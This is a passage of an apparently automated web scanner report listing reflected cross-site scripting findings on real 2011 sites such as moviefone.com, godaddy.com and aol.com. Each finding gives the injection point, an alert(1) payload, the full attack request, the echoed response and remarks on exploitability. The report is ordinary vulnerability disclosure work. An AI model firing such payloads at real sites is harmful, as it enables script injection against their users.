<link rel="canonical" href="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&fae19"><script>alert(1)</script>22fc5ab7398=1" />
...[SNIP]...

5.209. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7c4"-alert(1)-"b34755837c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:30 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:29 GMT; path=/
Content-Type: text/html
Content-Length: 63576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
le";
s_265.prop9="bsd:19931900";
s_265.prop12="http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545&7b7c4"-alert(1)-"b34755837c4=1";
s_265.prop17="former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11";
s_265.prop19="ariel-helwani";
s_265.prop22="StubHub";
s_265.prop21="commentsPage1";

var s_code=s_265.t();if(s_code)
...[SNIP]...

5.210. http://www.moviefone.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4776d"><script>alert(1)</script>59ea0380dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4776d"><script>alert(1)</script>59ea0380dd4=1 HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:50 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:49 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:50 GMT; path=/
Keep-Alive: timeout=5, max=999969
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 109015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...
<link rel="canonical" href="http://www.moviefone.com/?4776d"><script>alert(1)</script>59ea0380dd4=1"/>
...[SNIP]...

5.211. http://www.pageflakes.com/subscribe.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e187'-alert(1)-'e1daaea1081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx7e187'-alert(1)-'e1daaea1081 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:08 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=00AC81F260BA9A6D5FA9BF2E0A5F34B290777F13E4510D1166BCE4233715DDEC395F69E8143FCA0F905E564697A39C5855E5440A009381B14F7875F0917C6901D8FE5AE37B98CA6E21AAD688744FF342303E26421E926E5FA383B0022C4C45AF471CF31D7A9D60D5B866965A7C42DDCA932D74F3CA2E00A36A7F9949B4A359D81D6DCDB425DF75620502301B6EF64F4D920D4140F5819ED98494DEE07ECC46C9; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 14376


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-T
...[SNIP]...
<script type="text/javascript" id="StartupJSON">
var __getJsonQueryString = '?userName=subscribe.aspx7e187'-alert(1)-'e1daaea1081&r=634401657685468750';
document.write('<' + 'script type="text/javascript" id="GetJSON" src="/GetJSON.ashx' + __getJsonQueryString + '">
...[SNIP]...

5.212. http://www.pageflakes.com/subscribe.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ee6f</script><script>alert(1)</script>846c743547c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1 HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:05 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=09FEB47CFC6C6A3A9CA82F8313EDF2FE88BD584DCED8EA19F6FD5A6B17B4D3C5BFF448D5D70CC1BF473FFFE48C5DBACF66A47473612D3815F39076794F7B12ACF3C8D603D3511D39B29AD35BD13D362716DCA879751F283A6D1327219E1B538164FF4EA0D7830D9FB100B88E01C8BDB5DB7CF2F4D2637593CD2A55D43ECD5000BA7FB7D32E5787A99668E771D32E757968FCD8E1FC9BF5EEEC2F1574D9F16181; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 986


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...
document.referrer;
}
else
{
//I clicked the "add to pageflakes link". Please add this feed in my pageflakes page
var redirectUrl = 'subscribe2.aspx?8ee6f</script><script>alert(1)</script>846c743547c=1';
document.location.href="#marker";
document.location.href= redirectUrl;
}
</script>
...[SNIP]...

5.213. http://www.popeater.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d2e1"-alert(1)-"80c66c7340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?6d2e1"-alert(1)-"80c66c7340=1 HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:56 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:56 GMT; path=/
Keep-Alive: timeout=5, max=999981
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
" ;
s_265.linkInternalFilters="javascript:,popeater.com";
    s_265.prop2="news";
    s_265.prop1="popeater";
    s_265.prop6custom="";
    s_265.prop12= "http://www.popeater.com/?6d2e1"-alert(1)-"80c66c7340=1";
    s_265.channel="us.newspop";
    s_265.disablepihost=false;
    s_265.disablepipath=false;
    s_265.mmxtitle="";
    s_265.mmxcustom="";
    s_265.mmxgo=true;
s_265.t
...[SNIP]...

5.214. http://www.tuaw.com/hub/app-reviews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40b1"-alert(1)-"ce34c6a708f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1 HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:21 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:21 GMT; path=/
Content-Type: text/html
Content-Length: 32731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...
l="wb.tuaw";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,tuaw.com";
s_265.mmxgo = true;
s_265.prop1="Tech";
s_265.prop2="show-hub-apps";
s_265.prop12="http://www.tuaw.com/hub/app-reviews?a40b1"-alert(1)-"ce34c6a708f=1";
s_265.prop16="TUAW";
s_265.prop17="";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";
s_265.prop21="mtc";
s_265.prop22="16";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

5.215. https://www.godaddy.com/gdshop/hosting/landing.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 4ed38<script>alert(1)</script>672c0d44255 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:59 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=MOIOEHOALFKFLEHAKEPOPGGK; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4ed38<script>alert(1)</script>672c0d44255</b>
...[SNIP]...

5.216. https://www.godaddy.com/gdshop/registrar/search.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 7508f<script>alert(1)</script>c497b79206d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:46 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=AMIOEHOAKNNAOPGJAGICKMHH; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7508f<script>alert(1)</script>c497b79206d</b>
...[SNIP]...

5.217. https://www.godaddy.com/gdshop/website.asp [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 55b68<script>alert(1)</script>34586a0b13b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /gdshop/website.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16678
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:42 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=msvar%3Dtrue&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fbrowser%5Fupdate%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FLIOEHOAOGCDEGEAJKDIKAPM; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:42 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Browser Update Page</title>
<meta http-equiv="Content-T
...[SNIP]...
</B>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)55b68<script>alert(1)</script>34586a0b13b</b>
...[SNIP]...

5.218. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload 28c59<script>alert(1)</script>3c167e635e5 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=1301457219130361380328c59<script>alert(1)</script>3c167e635e5; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:02 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-01-00-02_2368081451304557202; expires=Tue, 03-May-2016 01:00:02 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_2368081451304557202; expires=Thu, 05-May-2011 01:15:02 GMT; path=/; domain=c3metrics.com
Content-Length: 6699
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='1301457219130361380328c59<script>alert(1)</script>3c167e635e5';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='2368081451304557202';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcal
...[SNIP]...

5.219. http://aol.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aol.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53936"><script>alert(1)</script>e289bae907e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?53936"><script>alert(1)</script>e289bae907e=1 HTTP/1.1
Host: aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1303579081524-New%7C1366651081524%3B%20s_nrgvo%3DNew%7C1366651081525%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:56:42 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:26:42 GMT
Content-length: 131
Content-type: text/html
Location: http://www.aol.com/?53936"><script>alert(1)</script>e289bae907e=1

<html>
<body>
Page relocated <a href="http://www.aol.com/?53936"><script>alert(1)</script>e289bae907e=1">here.</a>
</body>
</html>

5.220. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 80574<script>alert(1)</script>047c0d9a986 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p90452457&PRAd=310177527&AR_C=211671722 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/NYC/iview/310177527/direct;wi.300;hi.250/01/557100524?click=http://at.atwola.com/adlink/5113/1802172/0/170/AdId=1539894;BnId=1;itime=557100524;kvpg=dailyfinance;kvugc=0;kvmn=93310443;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:51182:56419:56148:57362:56835:51186:56673:56780:50220:56969:56299:54057:56987:50229:54063:57144:60183:60130;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
